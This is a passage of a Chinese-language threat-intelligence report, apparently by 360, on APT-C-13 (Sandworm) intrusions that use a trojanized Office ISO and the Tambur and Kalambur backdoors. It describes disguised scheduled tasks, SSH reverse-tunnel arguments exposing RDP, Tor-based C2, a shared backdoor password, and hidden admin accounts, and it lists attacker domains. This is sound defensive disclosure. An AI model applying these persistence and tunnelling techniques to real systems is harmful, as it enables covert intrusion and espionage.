16px;">APT-C-13（沙虫），又名APT44、Seashell Blizzard、Voodoo Bear，是一个顶级高级持续威胁（APT）组织。该组织长期针对全球范围内的关键基础设施、能源系统、重工业及政府核心部门实施高强度的网络渗透与战略破坏。</span></span></p><p style="text-align:justify;vertical-align: inherit;clear: both;color: rgb(51, 51, 51);text-indent: 28px;line-height: 1.5em;margin-top: 8px;margin-bottom: 8px;"><span style="line-height: 18.4px;font-size: 16px;" mpa-font-style="mn31i3ltf75"><span leaf="">其攻击活动最早可追溯至2009年前后，核心使命旨在通过网络手段实现地缘政治目标，涵盖了从深度内网情报收集、间谍活动到毁灭性系统破坏的全频谱作战。</span></span></p><p style="text-align:justify;vertical-align: inherit;clear: both;color: rgb(51, 51, 51);text-indent: 28px;line-height: 1.5em;margin-top: 8px;margin-bottom: 8px;"><span style="line-height: 18.4px;"><span leaf="" mpa-font-style="mn31i3ltdap" style="font-size: 16px;">该组织表现出极高的活跃度与技术韧性。即便近年来频繁面临多国政府的刑事起诉以及全球安全行业的密集曝光，APT-C-13非但未曾缩减其行动规模，反而展现出更强的技术进化能力。从早期的“瞬间致瘫”式破坏，到近期观测到的模块化渗透框架——通过隐蔽隧道与匿名网络实现的长期潜伏与驻留——该组织正以更加专业化、隐蔽化的战术策略，持续加剧着全球关键基础设施所面临的安全挑战。</span></span></p></div></div></div></div></div><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mmxaa02qm0g"><span leaf="" style="">360高级威胁研究院近期监测数据显示，APT-C-13组织近期正利用其深度迭代的模块化渗透框架——Tambur/Sumbur/Kalambur系列，针对攻击目标的国防工业、关键基础设施及政府职能部门开展高强度的定向攻击。</span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mmxaa02q1wq7"><span leaf="" style="">该组织在2024-2026年展现出明确的战略范式演进：通过投放嵌入恶意载荷的特洛伊化激活工具及盗版软件，精准切入目标内网，并依托隐蔽的反向加密隧道建立长效驻留。本报告据此展开专项分析，旨在揭示其从“瞬时破坏”向“情报导向型持续性寄生”的战术转型。建议相关关键机构及工业实体强化内网行为审计，提升针对合法管理协议异常活动的监测能力，以有效防范核心工业情报及战略数据面临的泄露风险。</span></p><div data-mpa-md-key="heading-1" style="margin-bottom: 16px;margin-top: 16px;"><div style="width: 100%;display: flex;justify-content: center;align-items: center;justify-content: flex-start;" data-mid=""><div style="text-align: left;" data-mid=""><p data-mpa-md-content="t" style="font-size: 18px;color: rgb(51, 51, 51);font-weight: bold;letter-spacing: 1px;text-align: left;" data-mid="" data-mpa-md-action-id="mmxaa02q22qc"><span leaf="">一、攻击链分析</span></p></div></div></div><p data-mpa-md-key="common" style="margin-bottom: 16px;margin-top: 16px;font-size: 16px;color: rgb(51, 51, 51);"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.764797507788162" data-s="300,640" data-type="jpeg" data-w="642" style="background-color: transparent;" type="block" data-imgfileid="100024379" src="https://wechat2rss.xlab.app/img-proxy/?k=7ba09390&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FEmmib7pWXrXKnwhFva92PTLnOc8o6ImbvCchlZkYddk1jicnu9o3NJJcaDpJp4D0C0gReuFaANQIdsvIXusQwMb0m2pSkgw1trt0M8pFPakm8%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></p><p data-mpa-md-key="common" style="margin-bottom: 16px;margin-top: 16px;font-size: 16px;color: rgb(51, 51, 51);text-indent: 2em;"><span leaf="" style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;">初始广撒网攻击阶段利用了封装有恶意载荷的镜像载体Microsoft.Office.2025x64.v2025.iso。</span></p><p data-mpa-md-key="common" style="margin-bottom: 16px;margin-top: 16px;font-size: 16px;color: rgb(51, 51, 51);text-align: center;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.11647727272727272" data-s="300,640" data-type="png" data-w="352" style="background-color: transparent;" type="block" data-imgfileid="100024380" src="https://wechat2rss.xlab.app/img-proxy/?k=1bbcab01&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXISy4fhPVDZBTpTn7sibEBbHHyQCKSHFUgfibV5FNdn3jEbQT7Dg8HuUTtSCIJBcbQSxdnXqkzVFnYn2D8JKKntOrB8e3avcr2Vs%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p data-mpa-md-key="common" style="margin-bottom: 16px;margin-top: 16px;font-size: 16px;color: rgb(51, 51, 51);text-indent: 2em;text-align: justify;"><span leaf="" style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;">该 ISO 镜像通过高度伪装的手段，将恶意代码嵌入至看似合法的办公软件激活流程中，利用用户对破解工具的信任实现初步渗透。</span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mmxaa02q60e"><span leaf="" style="">镜像内部集成了伪装成 auto.exe 或 setup.exe 的恶意引导程序。当用户挂载镜像并尝试启动“安装”或“激活”进程时，这些载荷执行器会作为攻击的第一阶段被触发，负责后续核心组件的释放与环境探测。</span></p><p data-mpa-md-key="common" style="margin-bottom: 16px;margin-top: 16px;font-size: 16px;color: rgb(51, 51, 51);text-indent: 0px;text-align: center;"><span leaf="" style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.25688073394495414" data-w="218" style="width: 217.98px;height: 55.99px;background-color: transparent;" src="https://wechat2rss.xlab.app/img-proxy/?k=0863151e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXI8kibOdnb22DGNX84oiakMFQFB6Rel4iahzgX7NiaxtdmtNQKbMc7Sge2e5ibTCZXZybiaiav0952TWG62KGSBrceIu9KfcIwgcO4NrY%2F640%3Fwx_fmt%3Dpng"/></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mmxaa02q4zd"><span leaf="" style="">根据情报溯源分析，此类攻击程序疑似托管于乌克兰境内的软件破解社区，并利用 Telegram 频道作为其主要的传播渠道，攻击者通过社会工程学手段精准诱导目标群体下载执行，这种“以利诱之”的投送策略显著压缩了传统安全边界的防御冗余。</span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mmxaa02qorc"><span leaf="" style="">在初始执行器激活后，攻击逻辑将进入攻击载荷释放阶段。攻击者在筛选高价值目标后按需落地具备特定功能的恶意模块。</span></p><p data-mpa-md-key="common" style="margin-bottom: 16px;margin-top: 16px;font-size: 16px;color: rgb(51, 51, 51);text-indent: 0px;text-align: center;"><span leaf="" style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5087719298245614" data-w="228" style="width: 227.98px;height: 115.99px;background-color: transparent;" src="https://wechat2rss.xlab.app/img-proxy/?k=ce85d878&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXKlwBFDtzFYMFibA9x53J4xrm7K8diauIQDiabMiaCibbu2WaYjob0iaf3j7HadwHIZziabBPhsTicavd0OMuVjNDs8icbj3WnjezS7DgPc%2F640%3Fwx_fmt%3Dpng"/></span></p><div data-mpa-md-key="heading-2" style="display: flex;"><div style="display:flex;align-items:flex-start;"><p data-mpa-md-content="t" style="font-weight: 600;font-size: 17px;color: rgb(37, 37, 37);line-height: 28px;flex: 1 1 0%;text-align: left;" data-mpa-md-action-id="mmxaa02q237w"><span leaf="">1. Tambur</span></p></div></div><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mmxaa02q1wvm"><span leaf="" style="">该攻击活动发现自乌克兰国营船舶机械制造厂一名技术人员的办公设备。攻击者利用 Windows 诊断基础设施（WDI）的合法路径作为掩护，通过计划任务实现了极其隐蔽的持久化控制。该威胁的核心在于利用SSH反向隧道绕过边界防火墙，并配合多级载荷分发机制进行C2指令传递，且攻击基础设施在命名语义上呈现出高度的协同性，进一步印证了这是一场预谋已久的定向攻击。</span></p><p data-mpa-md-key="heading-3" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;font-weight: bold;" data-mpa-md-action-id="mmxaa02r63t"><span leaf="">1.1 持久化</span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mmxaa02ru93"><span leaf="" style="">攻击者通过schtasks命令在系统关键路径\Microsoft\Windows\WDI\Protector\下创建了名为Tambur和Protector的计划任务。此举旨在模拟系统原生诊断组件，逃避常规的安全审计。</span></p><p data-mpa-md-key="common" style="margin-bottom: 16px;margin-top: 16px;font-size: 16px;color: rgb(51, 51, 51);text-indent: 0px;text-align: center;"><span leaf="" style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1427061310782241" data-w="946" style="width: 553.74px;height: 79px;background-color: transparent;" src="https://wechat2rss.xlab.app/img-proxy/?k=ad11099a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXIKMezDXHKx1I3M3fhiblu5FYNnm2rz8JgicEflj24cJENECVYTrOQtTlFzwgibGInuhoZh8AsDMCnZuh7kNOx8pNN1ibrEy32e8uI%2F640%3Fwx_fmt%3Dpng"/></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mmxaa02r1ojy"><span leaf="" style="">任务通过硬编码Administrator凭据（密码：1qaz@WSX）并指定/rl highest权限运行，确保了隧道在系统启动或用户登录后能够以最高权限建立，从而实现对远程桌面（RDP）服务的接管。</span></p><p data-mpa-md-key="heading-3" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;font-weight: bold;" data-mpa-md-action-id="mmxaa02rz40"><span leaf="">1.2 基础设施关联性分析</span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mmxaa02rk22"><span leaf="" style="">此次攻击活动中，基础设施的命名规律是判定攻击关联性的重要线索。</span></p><ul style="list-style-type: disc;padding-left: 1.2em;color: rgb(37, 37, 37);width: fit-content;" class="list-paddingleft-1"><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-content="t" data-mpa-md-key="bullet-list" data-mpa-md-action-id="$id"><span leaf="" style=""><span textstyle="" style="font-weight: bold;">隧道端点</span>：tambur@dontgivedamn.com（SSH 隧道接收端）。</span></p></li></ul><ul style="list-style-type: disc;padding-left: 1.2em;color: rgb(37, 37, 37);width: fit-content;" class="list-paddingleft-1"><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-content="t" data-mpa-md-key="bullet-list" data-mpa-md-action-id="$id"><span leaf="" style=""><span textstyle="" style="font-weight: bold;">载荷中继</span>：dontgivefuck.com（在受劫持站点脚本中发现的二级重定向地址）。</span></p></li></ul><p data-mpa-md-key="common" style="margin-bottom: 16px;margin-top: 16px;font-size: 16px;color: rgb(51, 51, 51);text-indent: 0px;text-align: center;"><span leaf="" style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.16956521739130434" data-w="920" style="width: 553.74px;height: 93.87px;background-color: transparent;" src="https://wechat2rss.xlab.app/img-proxy/?k=787273cb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXK43Oaqd5eqArKL36Yrpw1rXPLNsb1Ay39jbaVJevxP9JkT8ZrVc9TtI5feQRvNHA9V6yMJCxM2oVqQStoBFFHG3V4dXibZia7TQ%2F640%3Fwx_fmt%3Dpng"/></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mmxaa02r1ebk"><span leaf="" style="">这种具有高度一致性的“嘲讽式”命名（dontgive* 系列）并非偶然。这种语义上的强关联性，直接将“流量隧道化”与“外部载荷分发”两个独立的阶段连接在一起，勾勒出了一个闭环的攻击架构：</span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mmxaa02r1u1p"><span leaf="" style="">攻击者首先通过dontgivefuck.com下发攻击指令和后续载荷，随后通过dontgivedamn.com建立持久化的反向控制通道。这种命名偏好与部分东欧背景的攻击组织在快速更迭C2时表现出的TTP高度吻合。</span></p><p data-mpa-md-key="heading-3" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;font-weight: bold;" data-mpa-md-action-id="mmxaa02ri4q"><span leaf="">1.3 RDP与SSH</span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mmxaa02r1rsj"><span leaf="" style="">攻击者利用内置ssh.exe建立的反向隧道绕过了传统安全防御的出站限制：</span></p><p data-mpa-md-key="common" style="margin-bottom: 16px;margin-top: 16px;font-size: 16px;color: rgb(51, 51, 51);text-indent: 0px;text-align: center;"><span leaf="" style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.04685212298682284" data-w="1366" style="width: 553.74px;height: 25.93px;background-color: transparent;" src="https://wechat2rss.xlab.app/img-proxy/?k=f1b86e6d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXLvRqWicGmuEX7iasKMYyh8iaRTfveORNQu5Yxe0nNN9fM1ibzpGS4OKGEVx1VMofPU8zdK0mWW2TDY4kAIqIfqmFIicxlEOEz8PW4k%2F640%3Fwx_fmt%3Dpng"/></span></p><ul style="list-style-type: disc;padding-left: 1.2em;color: rgb(37, 37, 37);width: fit-content;" class="list-paddingleft-1"><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-content="t" data-mpa-md-key="bullet-list" data-mpa-md-action-id="$id"><span leaf="" style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><span textstyle="" style="font-weight: bold;">RDP 暴露</span>：-R 127.0.0.1:30054:127.0.0.1:3389。攻击者只需在远端C2服务器连接自身的30054端口，即可直接映射并控制内网受害主机的3389(RDP)服务。</span></p></li><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-content="t" data-mpa-md-key="bullet-list" data-mpa-md-action-id="$id"><span leaf="" style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><span textstyle="" style="font-weight: bold;">SSH 级联</span>：-R 127.0.0.1:20054:127.0.0.1:22。通过将本地SSH端口转发至外部，攻击者构建了一个双向的加密管理通道，用于文件传输及命令执行。</span></p></li></ul><p data-mpa-md-key="heading-3" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;font-weight: bold;" data-mpa-md-action-id="mmxaa02rfg0"><span leaf="">1.4 信息收集与自清理</span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mmxaa02r1owx"><span leaf="" style="">在维持控制的同时，攻击者通过PowerShell脚本收集目标主机信息：</span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mmxaa02s11kh"><span leaf="">1).<span textstyle="" style="font-weight: bold;">唯一性标识</span>： 采集硬件UUID和注册表MachineGuid，用于在C2侧精准区分受害者。</span></p><p data-mpa-md-key="common" style="margin-bottom: 16px;margin-top: 16px;font-size: 16px;color: rgb(51, 51, 51);text-indent: 0px;text-align: center;"><span leaf="" style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.0962566844919786" data-w="935" style="width: 553.74px;height: 53.33px;background-color: transparent;" src="https://wechat2rss.xlab.app/img-proxy/?k=85a087b3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXKvt6subiaHMicOEqqp018GJ5ya1A9IgicmuS8gZmibCGYR7mnO0ZE8ibpn69G9qjNEJViaL0PBGWs2MDTVkJG8hUtUm1NK5RHRbnIvo%2F640%3Fwx_fmt%3Dpng"/></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mmxaa02s1qsl"><span leaf="">2).<span textstyle="" style="font-weight: bold;">存活判定</span>： 实时探测 sshd 进程状态及 22 端口监听情况，确保隧道组件的可用性。</span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mmxaa02spsa"><span leaf="">3).<span textstyle="" style="font-weight: bold;">载荷回收</span>： 计划任务 Protector 展现了成熟的反取证意识。通过 sleep 97 延时后强制删除C:\Windows\Temp\ittem.exe。</span></p><p data-mpa-md-key="common" style="margin-bottom: 16px;margin-top: 16px;font-size: 16px;color: rgb(51, 51, 51);text-indent: 0px;text-align: center;"><span leaf="" style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.05384615384615385" data-w="1170" style="width: 553.74px;height: 29.8px;background-color: transparent;" src="https://wechat2rss.xlab.app/img-proxy/?k=bdf2f928&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXKGTX6eOaSVYc3gZbSC7uBB0ZafAsCT2WWrLibIRb8Tj3AvfP8GFeWItwWR1dkqhYsekLb6JMI49iaOOmKNs0WAJGcK1QsENqjibE%2F640%3Fwx_fmt%3Dpng"/></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mmxaa02s531"><span leaf="" style="">这种“阅后即焚”的手段极大压缩了应急响应人员获取恶意样本的窗口期。</span></p><div data-mpa-md-key="heading-2" style="display: flex;"><div style="display:flex;align-items:flex-start;"><p data-mpa-md-content="t" style="font-weight: 600;font-size: 17px;color: rgb(37, 37, 37);line-height: 28px;flex: 1 1 0%;text-align: left;" data-mpa-md-action-id="mmxaa02s243r"><span leaf="">2. Kalambur</span></p></div></div><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mmxaa02s1izi"><span leaf="" style="">该脚本是一个高度集成化的多阶段后门程序,其核心战术（TTPs）围绕内网穿透、远程桌面（RDP）接管以及持久化通信展开。通过利用Tor网络屏蔽真实C2流量，并结合OpenSSH与 VBScript 封装，该攻击框架展现了极强的防御规避能力和对目标系统的深度控制意图。</span></p><p data-mpa-md-key="heading-3" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;font-weight: bold;" data-mpa-md-action-id="mmxaa02s1t1f"><span leaf="">2.1 信息收集</span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mmxaa02so1b"><span leaf="" style="">收集目标主机公网 IP、硬件 UUID及系统主机名。</span></p><p data-mpa-md-key="common" style="margin-bottom: 16px;margin-top: 16px;font-size: 16px;color: rgb(51, 51, 51);text-indent: 0px;text-align: center;"><span leaf="" style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.14935822637106183" data-w="857" style="width: 553.74px;height: 82.67px;background-color: transparent;" src="https://wechat2rss.xlab.app/img-proxy/?k=33c2c5bf&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXJ7ShWwu8AIIwX2iak1SxFy8DvNJrB8RXta7j16wB6Eku8mCibtQ7nD3Jjydg85gVpYbwpMNZgYCL8Yk9YZKksVUZOjhH79mqkSE%2F640%3Fwx_fmt%3Dpng"/></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mmxaa02s2103"><span leaf="">收集结果将写入%PUBLIC%\Windows Update\ 目录下的隐藏文件中，作为后续 C2 通信的唯一索引。</span></p><p data-mpa-md-key="heading-3" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;font-weight: bold;" data-mpa-md-action-id="mmxaa02s78v"><span leaf="">2.2 基础设施构建</span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mmxaa02sf4x"><span leaf="" style="">攻击者并不依赖传统的明文 HTTP 通信，而是构建了复杂的加密隧道架构：</span></p><ul style="list-style-type: disc;padding-left: 1.2em;color: rgb(37, 37, 37);width: fit-content;" class="list-paddingleft-1"><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-content="t" data-mpa-md-key="bullet-list" data-mpa-md-action-id="$id"><span leaf=""><span textstyle="" style="font-weight: bold;">Tor 网络接入</span>：脚本内置了 Check-IfTorExist 和 Check-Rot 功能，旨在强制关闭现有的 Tor 进程，并从 kalambur[.]net 下载并安装自定义的Tor服务。该服务将本地 9050 端口作为 SOCKS5代理，使后续流量能够通过.onion 域名进行匿名化传输。</span></p></li></ul><p data-mpa-md-key="common" style="margin-bottom: 16px;margin-top: 16px;font-size: 16px;color: rgb(51, 51, 51);text-indent: 0px;text-align: center;"><span leaf="" style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.8578066914498141" data-w="1076" style="width: 553.74px;height: 475.01px;background-color: transparent;" src="https://wechat2rss.xlab.app/img-proxy/?k=c1400f4f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXKBVOuJLvIgP1XT5daznGIKUibcd5OTib4JykaUy3Bf3iazv05UEiapdWAOlkibRoibee3dL6U9NgbAOzvUAzCzibYiasAItvW14aOYia1A%2F640%3Fwx_fmt%3Dpng"/></span></p><ul style="list-style-type: disc;padding-left: 1.2em;color: rgb(37, 37, 37);width: fit-content;" class="list-paddingleft-1"><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-content="t" data-mpa-md-key="bullet-list" data-mpa-md-action-id="$id"><span leaf=""><span textstyle="" style="font-weight: bold;">SSH 服务部署</span>：脚本通过 Check-OpenSSH 远程拉取官方 OpenSSH MSI 安装包，静默安装后强行开启入站防火墙规则（端口 22），将受害主机转化为一个稳定的内网跳板。</span></p></li></ul><p data-mpa-md-key="common" style="margin-bottom: 16px;margin-top: 16px;font-size: 16px;color: rgb(51, 51, 51);text-indent: 0px;text-align: center;"><span leaf="" style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1017733230531997" data-w="1297" style="width: 553.74px;height: 56.33px;background-color: transparent;" src="https://wechat2rss.xlab.app/img-proxy/?k=e10f2e5c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXLOZw2gEvTrrS3vtvnaOXOBCjibaZ6kBcWficQSkhDn7WxvUkRlLDwicYfDgtTylXrQvibsGS33IpF3fIgq4OiaBmzJ3XpJD7OkFsaM%2F640%3Fwx_fmt%3Dpng"/></span></p><p data-mpa-md-key="heading-3" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;font-weight: bold;" data-mpa-md-action-id="mmxaa02s561"><span leaf="">2.3 权限维持</span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mmxaa02s1yhq"><span leaf="" style="">攻击者对系统的控制策略表现出明显的“权限饥渴”与“隐蔽维持”特征：</span></p><ul style="list-style-type: disc;padding-left: 1.2em;color: rgb(37, 37, 37);width: fit-content;" class="list-paddingleft-1"><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-content="t" data-mpa-md-key="bullet-list" data-mpa-md-action-id="$id"><span leaf=""><span textstyle="" style="font-weight: bold;">后门账户创建</span>：脚本根据系统环境，尝试启用禁用的 500 SID 账户，或创建名为 Admin 或 WGUtilityOperator 的新账户。所有后门账户均统一使用强关联密码 1qaz@WSX。</span></p></li></ul><p data-mpa-md-key="common" style="margin-bottom: 16px;margin-top: 16px;font-size: 16px;color: rgb(51, 51, 51);text-indent: 0px;text-align: center;"><span leaf="" style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.6496674057649667" data-w="902" style="width: 553.74px;height: 359.74px;background-color: transparent;" src="https://wechat2rss.xlab.app/img-proxy/?k=a41a6519&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXJibvYPRMa5mxoxwf4xoJMVq2p9A8tY5iaiavStWTDUSiaiaaq6eOGqSUKxhmk1Zpv8mhFWb2WiaN93c2YjW51UHtatLJAQX1Qx5ic3PI%2F640%3Fwx_fmt%3Dpng"/></span></p><ul style="list-style-type: disc;padding-left: 1.2em;color: rgb(37, 37, 37);width: fit-content;" class="list-paddingleft-1"><li><div style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-content="t" data-mpa-md-key="bullet-list" data-mpa-md-action-id="$id"><p style="" data-mpa-md-content="t"><span leaf=""><span textstyle="" style="font-weight: bold;">RDP 配置：</span>修改注册表以禁用 RDP 连接限制。</span></p><p style="text-indent: 0px;" data-mpa-md-content="t"><span leaf="">- 启用影子会话 (Shadowing) 功能，允许攻击者静默监控当前用户的桌面。</span></p><p style="text-indent: 0px;" data-mpa-md-content="t"><span leaf="">- 通过 SpecialAccounts 注册表项实现账户在登录界面的完全隐藏。</span></p></div></li></ul><p data-mpa-md-key="common" style="margin-bottom: 16px;margin-top: 16px;font-size: 16px;color: rgb(51, 51, 51);text-indent: 0px;text-align: center;"><span leaf="" style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.2652439024390244" data-w="1312" style="width: 553.74px;height: 146.87px;background-color: transparent;" src="https://wechat2rss.xlab.app/img-proxy/?k=05456844&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXIaUQQN5ppMAZ2WnsskEdYiaxIODnCOhL7Vt9iblHMfMMrAniabeBHm5qYClrB1N7uPicag8mgibPL6jC2NHdxdXEwia37NARvXxnNbE%2F640%3Fwx_fmt%3Dpng"/></span></p><ul style="list-style-type: disc;padding-left: 1.2em;color: rgb(37, 37, 37);width: fit-content;" class="list-paddingleft-1"><li><p style="margin-bottom: 8px;font-size: 16px;color: rgb(51, 51, 51);letter-spacing: 1px;text-align: justify;" data-mpa-md-content="t" 